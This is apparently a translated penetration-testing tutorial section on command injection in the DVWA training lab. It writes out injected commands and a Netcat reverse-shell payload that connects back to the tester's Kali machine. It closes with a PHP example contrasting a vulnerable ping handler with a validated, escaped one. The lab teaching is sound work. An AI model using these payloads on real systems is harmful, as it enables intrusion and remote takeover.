The mine casting team

Member Information:

Thr0cyte, Gr33k, Hua Hua, MrTools, R1ght0us, 7089bAt


6.0. Introduction

6.1. Find file inclusion vulnerabilities

6.2. File inclusion and file upload

6.3. Verify SQL injection manually

6.4. Error-based SQL injection

6.5. Identify and exploit blind SQL injection vulnerabilities

6.6. Use SQLMap to find and exploit SQL injection

6.7. Exploit XML external entity injection

6.8. Detect and exploit command injection vulnerabilities


6.8. Detect and exploit command injection vulnerabilities

We have already seen how PHP's system() function can be used to execute operating system commands on the server. Sometimes developers use this function, or others with the same effect, to perform certain tasks, and end up passing unvalidated user input as part of the command that gets executed. This creates a command injection vulnerability.

In this section, we will exploit a command injection vulnerability to extract important information from the server.


How to do it

Log in to DVWA and go to the Command Execution page.

1. We'll see a free-form Ping form. Let's try pinging 192.168.56.10 (this is our Kali Linux IP):

The output looks as if it was taken directly from the output of the ping command. This suggests that the server is running an operating system command to do the ping, so it may be possible to inject further operating system commands.

2. Let's try injecting a very simple command. Submit the following:

192.168.56.10; uname -a

We can see the output of the uname command after the ping output. We have a command injection vulnerability here.

3. What happens if we remove the IP address and submit only uname -a? The result is shown below:

4. Now we'll get a reverse shell on the server. First, we have to make sure the server has what we need. Submit ; ls /bin/nc* and it should return a list of files with their full paths:

The server has more than one version of Netcat, the tool we will use to create the connection. The OpenBSD version of Netcat does not support executing a command when a connection is made, so we will use the traditional one.

5. The next step is to listen for the connection on Kali Linux. Open a terminal and run the following command:

nc -lp 1691 -v

6. Then we submit the following in the browser:

; nc.traditional -e /bin/bash 192.168.56.10 1691 &

7. We will see the listener in the Kali terminal receive the connection. From here, we can execute commands on the server, as shown below:

Our terminal reacts to the connection. Now we can issue non-interactive commands and examine their output.


How it works

As with SQLi and the other examples, the command injection vulnerability is caused by poor input validation and by the use of user-supplied data to build strings that are then executed as operating system commands. If we look at the source code of the page we just attacked (each DVWA page has a View Source button in the lower right corner), it looks like this:

We can see that it appends the user input directly to the ping command. All we do is add a semicolon, which the system shell interprets as a command separator, followed by the command we want to execute.

After confirming command execution, the next step is to verify that the server has Netcat, a tool that can establish network connections and, in some versions, execute a program when a new connection is established.

We saw that the server had two different versions of Netcat installed, and we chose the one that has the feature we need (the -e option, which runs a program on connection).

We then set our attacking system to listen for connections on TCP port 1691 (any other available TCP port would do) and instructed the server to connect to our machine on that port and execute /bin/bash (the system shell) once the connection is established. Anything we send over this connection is received as input by the shell on the server. The & at the end of the command runs it in the background, so that the PHP script does not hang waiting for the command to return.
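The DVWA source the text refers to is a screenshot that did not survive, so here is an added example, written for this edit and not taken from DVWA or from the book, of the pattern described above (user input concatenated straight into the ping command) next to a hardened handler. It reproduces locally what steps 2 and 3 show in the browser. It assumes a PHP CLI on a Linux host with ping installed; the function names, the ping options and the payloads are constructed for illustration.

```php
<?php
// Added example (not DVWA's own code): the vulnerable pattern the text
// describes, and a hardened version of the same "ping" handler.

function ping_vulnerable(string $target): string
{
    // The user's value is glued into a shell command line. The shell parses the
    // whole string, so a ';' inside $target terminates the ping command and
    // starts a second command: "192.168.56.10; uname -a" runs both of them.
    $cmd = 'ping -c 3 ' . $target;   // -c 3 is an assumed option, as in DVWA
    return (string) shell_exec($cmd);
}

function ping_hardened(string $target): string
{
    // 1. Positive validation: accept only a syntactically valid IPv4/IPv6
    //    address. Anything else (';', '&', '|', newlines, hostnames) is refused
    //    before a shell is ever involved.
    if (filter_var($target, FILTER_VALIDATE_IP) === false) {
        return "Invalid target\n";
    }
    // 2. Defence in depth: even the validated value is wrapped by
    //    escapeshellarg(), so the shell passes it to ping as one literal
    //    argument ('...' quoting on POSIX) and cannot split it into commands.
    $cmd = 'ping -c 3 ' . escapeshellarg($target);
    return (string) shell_exec($cmd);
}

// Constructed inputs: the benign request from step 1 and the payload from step 2.
$benign  = '192.168.56.10';
$payload = '192.168.56.10; uname -a';

echo "--- vulnerable handler, benign input ---\n";
echo ping_vulnerable($benign);

echo "--- vulnerable handler, injected input ---\n";
echo ping_vulnerable($payload);

echo "--- hardened handler, injected input ---\n";
echo ping_hardened($payload);

echo "--- hardened handler, benign input ---\n";
echo ping_hardened($benign);
```

Run it with `php ping_demo.php` (any file name will do). With the injected input, the vulnerable handler prints the kernel banner from uname right after the ping output, exactly the behaviour seen in step 2, while the hardened handler rejects the value at the validation step. If the validation line were removed, escapeshellarg() alone would still prevent the injection: ping would receive the single argument "192.168.56.10; uname -a" and fail to resolve it, and no second command would run. Validation comes first because it also stops the input from reaching ping at all, so the command's own option parsing cannot be abused either.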
